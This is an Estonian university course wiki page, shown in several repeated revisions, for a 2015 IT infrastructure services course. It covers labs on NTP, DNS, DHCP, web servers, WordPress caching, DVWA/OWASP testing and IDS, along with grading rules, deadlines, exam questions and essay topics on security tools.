PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-20T05:59:40Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

[[iodine]]

[[fabric]]

[[mpstat]]

[[arpwatch]]

[[ss]]

[[glances]]

[[mod_status]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-20T05:58:55Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

[[iodine]]

[[fabric]]

[[mpstat]]

[[arpwatch]]

[[ss]]

[[glances]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
